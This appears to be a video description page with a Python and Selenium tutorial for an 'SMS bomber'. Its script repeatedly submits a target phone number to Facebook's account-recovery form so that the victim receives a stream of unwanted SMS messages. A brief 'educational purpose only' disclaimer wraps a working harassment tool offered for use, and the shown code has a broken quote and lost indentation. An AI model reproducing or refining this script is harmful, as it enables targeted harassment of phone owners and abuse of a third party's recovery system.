• 3 years ago
Link for Download web browser:
https://chromedriver.chromium.org/downloads
Making of SMS Bomber using Selenium and Python:


Here, we are going to learn a simple SMS bomber trick (for fun and educational purpose).
Selenium is a free tool for automated testing across different browsers.
In this video, we will learn to send automatically number of spam SMS for given number of frequency and interval.
Requirement:
You need to install chromedriver , pycharm and set path.
These are the steps:
• First go to Facebook Recover website.
• Then click on inspect element by pressing ctrl + shift + i or going in setting of browser and clicking on inspect element manually.
• Then find the class name of “enter No” input field .

Note: This Video is for educational purpose only, please don’t use it for disturbing anyone or any unethical way and I’m not responsible for what you do by this.

Code:

from selenium import webdriver
import time
browser = webdriver.Chrome('chromedriver.exe')
for x in range(20):
browser.get('https://www.facebook.com/login/identify/?ctx=recover')
number = browser.find_element_by_xpath('//*[@id="identify_email"]')
did_submit = browser.find_element_by_name('did_submit')
number.send_keys('xxxxxxxxxxxx)
did_submit.click()
time.sleep(3)
submit = browser.find_element_by_xpath('//*[@id="initiate_interstitial"]/div[2]/div/div[1]/button')
submit.click()
time.sleep(3)




If you have any computer/software related problems, please feel free to contact us on our email and comment down below on our videos about your problem, and we will make a video for you to resolve it!



Follow Me :
on Instagram: https://www.instagram.com/itz_mohit.g...


Facebook: https://www.facebook.com/mohit11082000


Twitter: https://twitter.com/MohitGo99070162


Visit In to My blog: https://mohitpy.blogspot.com/


Python Project Ideas for New Python MASTERS : https://mohitpy.blogspot.com/2020/09/...


Python projects List: https://mohitpy.blogspot.com/2020/09/...


Tinkercad Practicals: https://mohitpy.blogspot.com/2020/09/...


Learn Python : https://mohitpy.blogspot.com/search?&...

Category

🤖
Tech

Recommended